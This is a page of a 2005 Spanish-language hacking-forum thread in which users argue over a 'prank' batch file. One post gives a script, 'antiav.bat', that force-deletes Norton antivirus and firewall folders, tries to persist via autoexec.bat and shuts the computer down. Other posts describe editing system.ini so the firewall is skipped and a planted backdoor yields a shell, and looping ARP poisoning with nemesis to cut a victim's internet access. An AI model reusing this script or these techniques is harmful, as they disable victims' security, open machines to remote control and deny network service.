elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  broma bat!!!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 5 6 7 8 9 Ir Abajo Respuesta Imprimir
Autor Tema: broma bat!!!  (Leído 57,025 veces)
von Newman


Desconectado Desconectado

Mensajes: 355


Ver Perfil WWW
Re: broma bat!!!
« Respuesta #20 en: 12 Agosto 2005, 08:04 am »

APLAUSOS!!!! tirher tienes toda la razón con respecto al uso de los comentarios y verdaderamente no hay que darselas de genio uno sabe lo que sabe y el mayor insulto es el no insultar.
me agradaria ver como midificas este bat con el bucle y si tienes otra idea pues xfavor ponla.
saludotes!!!
PD:alguien sabe como abrir una carpeta .zip o archivo .zip desde un bat?
En línea

dArK_gAp

Desconectado Desconectado

Mensajes: 80


Being curious is not a crime babe.


Ver Perfil WWW
Re: broma bat!!!
« Respuesta #21 en: 12 Agosto 2005, 11:11 am »

Manibal_man:
me uno a von newman en la suplica...deja de meterte con gente que ni siquiera tienes idea de lo que se han currado un post para que la gente se informe. Creo que sabrás que como buen hacker, von newman, ha entregado su aportación a la comunidad. Además realmente crees que no tiene una utilidad?...pues creo que te equivocas.
von Newman: gracias por recordarnos a todos (al menos a aquellos que hemos leido en tu post un reto) lo dañino de los bat. He encontrado en un sp2 una vulnerabilidad que podría ser explotada gracias a un rootkit o bien una backdoor previamante instalada. Mediante la "broma" modificada podemos, sin que el usuario deje de pensar que es una tontería, modificar el system.ini para que no encuentre el firewall de windows al reiniciar y lea nuestro bat2 (para eso hay que mandarle 2bats) tras cargar todos los controladores, y hacer un shutdown. Cuando reinicie el ordenador volverá a "leer la broma 2" y mediante la backdoor instalada previamente como dije en un principio, podremos controlar la shell de su máquina.
Todo esto es obvio que lo he realizado en una LAN, a la que yo pertenezco.

Un saludo

#################dArK_gAp################
En línea

La música es cultura. El hombre se diferencia de los animales por su cultura. Es justo que alguien me cobre por acceder a la cultura. Es justo que me cobren por acceder a lo que somos como fin último? Quien tiene la patente de la humanidad?
"El hombre es el animal de la cultura", que nadie te prohiba serlo.
Manibal_man


Desconectado Desconectado

Mensajes: 528



Ver Perfil
Re: broma bat!!!
« Respuesta #22 en: 12 Agosto 2005, 15:51 pm »

antes dije... que ya no habia nada para aportar... pero veo que me equivoque... asi que posteo una vez mas...

no me meto con nadie... lean todo el thread y van a notar que e slo que pasa: von newman agredio a gente, cuando el desde un principio dijo que era para una broma, y que no sabia para que podia servir.

SOSTENGO que practicamente no sirve poara nada... porque el ejemplo patetico del que habla dark_gap sirve solo para una maquina sin antivirus, sin firewall real. un rootkit o una backdoor pueden descargarse sin problemas...

ESTE bat en particular no sirve para nada.

por otro lado. HACKERS??? jajajajajaj

Saludos
En línea

:: I was born ready motha fucka ::
H@T


Desconectado Desconectado

Mensajes: 540



Ver Perfil WWW
Re: broma bat!!!
« Respuesta #23 en: 12 Agosto 2005, 16:53 pm »

Verdaderamente es muy simple usar el for, ya que en el cmd pones:
c:\FOR %variable IN (rango) DO comando

aca te mando un ejemplo:

c:\FOR %i IN (1,1,3) DO dir

Vas a ver que esto te lista 3 veces el directorio actual...

Para el que dice que no se puede hacer nada con un bat, te explico que un hombre de aca de Bs. As. que dio una charla de seguridad hizo con un FOR bloquear todos los usuarios de un dominio, Denegacion de Servicio, te parece una pavada???

Otra cosa yo he hecho tambien denegacion de servicio de internet en una red LAN mediante la herramienta nemesis, pero me tube que ayudar con un bat para hacerlo repetitivo, ya que sin el FOR dura pocos segundos....
En línea

H@T
http://www.redes-seguridad.com.ar
redes-seguridad.blogspot.com/
dArK_gAp

Desconectado Desconectado

Mensajes: 80


Being curious is not a crime babe.


Ver Perfil WWW
Re: broma bat!!!
« Respuesta #24 en: 13 Agosto 2005, 15:09 pm »

Exactamente tirher: programas como el nemesis no valdrían para nada en lo referido al arp, ya que windows carga cada cierto tiempo la lista arp, y aunque con el nemesis varíes la ip del router al renovar esa lista todo nuestro trabajo se va a la ***** de no ser por el comando for. Gracias a esta sencillo bat podemos hacer que la infeccion se repita cada cierto tiempo y mantener sin servicio de internet asi como otras cosas el pc al que hemos realizado el arp poisoning.

Un saludo a Los HACKERS (sisi lo digo sin ningun jeje porque se que existen por aki)

#################dArK_gAp################
« Última modificación: 21 Agosto 2005, 16:02 pm por dArK_gAp » En línea

La música es cultura. El hombre se diferencia de los animales por su cultura. Es justo que alguien me cobre por acceder a la cultura. Es justo que me cobren por acceder a lo que somos como fin último? Quien tiene la patente de la humanidad?
"El hombre es el animal de la cultura", que nadie te prohiba serlo.
Manibal_man


Desconectado Desconectado

Mensajes: 528



Ver Perfil
Re: broma bat!!!
« Respuesta #25 en: 13 Agosto 2005, 16:43 pm »

Por dios!!! nadie lee el thread completo???
Citar
Para el que dice que no se puede hacer nada con un bat, te explico que un hombre de aca de Bs. As. que dio una charla de seguridad hizo con un FOR bloquear todos los usuarios de un dominio, Denegacion de Servicio, te parece una pavada???
si te referis a mi... te sugiero que releas el thread... nunca desmereci a LOS .BAT, eso seria una estupidez, el Batch es un muy buen lenguaje de scripts (y que quede claro.. SCRIPTS)
es decir: automatizacion de ordenes, por decirlo de alguna manera

esto es de mi otro post para los que no entendieron:
Citar
ESTE bat en particular no sirve para nada.
ok, entendieron? dije ESTE .bat, no LOS .bat, ok? ESTE, no TODOS, SOLO ESTE (uff, espero que lo entiendan porque este si es mi ultimo post al thread, ya realmente no vale la pena postear aca si algunos no pueden mantener en su cabeza el hilo)

Por favor... los ciclos for son un elemento esencial de cualquier algoritmo...

eso no quiere decir que el "flood" posteado al principio tenga algun uso importante... en este caso, el bat propuesto al principio no sirve para NADA.

please dark_gap, habla solo de lo que sabes... e intenta mantener un hilo si?

es una pena...

« Última modificación: 13 Agosto 2005, 17:02 pm por Manibal_man » En línea

:: I was born ready motha fucka ::
von Newman


Desconectado Desconectado

Mensajes: 355


Ver Perfil WWW
Re: broma bat!!!
« Respuesta #26 en: 14 Agosto 2005, 07:40 am »

dArK_gAp y  tirher gracias por apollarme y sobre todo por no caer en la estupides de cerrarse a  no ver lo que dije en un principio:
Citar
hola, weno que les parece? a alguien se le ocurre algo pa´ hacerlo más dañino o más gracioso?
saludos
tambien postee esto para que cambiaran el codigo y aportaran algo al hack asi que manibal creo que el que debe leer eres TU!
no nos insultes al desmerecernos, por mi parte no solo llevo unos meses en el underground soy todavia chavo y me falta mucho por aprender por el conocimiento nunca llega a su fin pero mi conocimiento lo he demostrado en mas de una ocación. Y no es que diga que sea un master hacker pero no soy lamer como piensas que soy:
Citar
esto tambien se podria usar como un ataque pero no he pensado mucho en eso.
con esto no quiere decir que no haya pensado en cosas maliciosas ¿pero que acaso no es de lamers pensar así??
luego escribes esta verdadera estupides:
Citar
SOSTENGO que practicamente no sirve poara nada... porque el ejemplo patetico del que habla dark_gap sirve solo para una maquina sin antivirus, sin firewall real. un rootkit o una backdoor pueden descargarse sin problemas...
jajajaja por eso este bello lenguaje nos da la solución:
**antiav.bat**
*---------------------------------------------*
@echo
cd
cd\
del /f /q /s C:\"Archivos de programas"\"Norton AntiVirus"
del /f /q /s C:\"Archivos de programas"\"Norton Persona Firewall"
cls
cd\antiav.bat>>autoexec.bat
shutdown /s /t /f /c "con esto se comprueba que la seguridad es matada por un simple bat"
*----------------------------------------------------*
lo del bucle con for como dije es buena idea y como dijiste crea un D.o.S. imaginense si x cada pantalla abierta nos mandara 5 centavos seraia genial! pero logico que no solo con un bat  es ahí donde quise que propusieran ideas.
Citar
please dark_gap, habla solo de lo que sabes... e intenta mantener un hilo si?

es una pena...
dark_gap??? ? creo que TU nos das pena, alguien de mente tan cerrada (y no diras que como sabes si nio me conoces por que lo has demostrado).

creo que hay más personas como dArK_gAp y  tirher que querran colaborar.

saludos

PD: tadavia me sigo riendo
Citar
SOSTENGO que practicamente no sirve poara nada... porque el ejemplo patetico del que habla dark_gap sirve solo para una maquina sin antivirus, sin firewall real. un rootkit o una backdoor pueden descargarse sin problemas...
jajajajajajajajajajajajajaja luego pongo un ejemplo de una backdoor con un bat para que me de más risa
En línea

Manibal_man


Desconectado Desconectado

Mensajes: 528



Ver Perfil
Re: broma bat!!!
« Respuesta #27 en: 14 Agosto 2005, 18:35 pm »

por favor...
En línea

:: I was born ready motha fucka ::
von Newman


Desconectado Desconectado

Mensajes: 355


Ver Perfil WWW
Re: broma bat!!!
« Respuesta #28 en: 15 Agosto 2005, 01:56 am »

Citar
Para mi ya termino el tema, dije lo queria decir y demostré lo que queria demostrar.
ya!!!!!
Citar
por favor...
En línea

dArK_gAp

Desconectado Desconectado

Mensajes: 80


Being curious is not a crime babe.


Ver Perfil WWW
Re: broma bat!!!
« Respuesta #29 en: 19 Agosto 2005, 16:54 pm »

De nada, creo que poca gente tiene idea de lo dañinos que son los bat. De hecho el menor fallo en uno de los bat de carga de windows....pero bueno seguid pensando que el mundo acaba donde lo hacen vuestros ojos.
Von Newman: sigue así, y por favor comparte tus avances futuros con la comunidad aun a pesar de que exista gente que te intente hacer caer.

Un saludo

################dArK_gAp#################
En línea

La música es cultura. El hombre se diferencia de los animales por su cultura. Es justo que alguien me cobre por acceder a la cultura. Es justo que me cobren por acceder a lo que somos como fin último? Quien tiene la patente de la humanidad?
"El hombre es el animal de la cultura", que nadie te prohiba serlo.
Páginas: 1 2 [3] 4 5 6 7 8 9 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
broma con vb « 1 2 »
Programación Visual Basic
vivachapas 17 5,899 Último mensaje 20 Abril 2007, 23:54 pm
por Ch3ck
[BROMA] AutoDestruccion
Programación Visual Basic
79137913 7 5,282 Último mensaje 12 Febrero 2011, 16:20 pm
por Edu
Broma para gastarle a alguien que te cae muy mal
Foro Libre
crazykenny 1 2,067 Último mensaje 19 Marzo 2012, 22:28 pm
por anonimo12121
Broma c++
Programación C/C++
daryo 7 4,743 Último mensaje 24 Mayo 2013, 22:57 pm
por Stakewinner00
como crear link con broma (joke),estilo broma (ooskar)
Foro Libre
Mamba Negra2 0 4,744 Último mensaje 19 Enero 2014, 11:24 am
por Mamba Negra2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines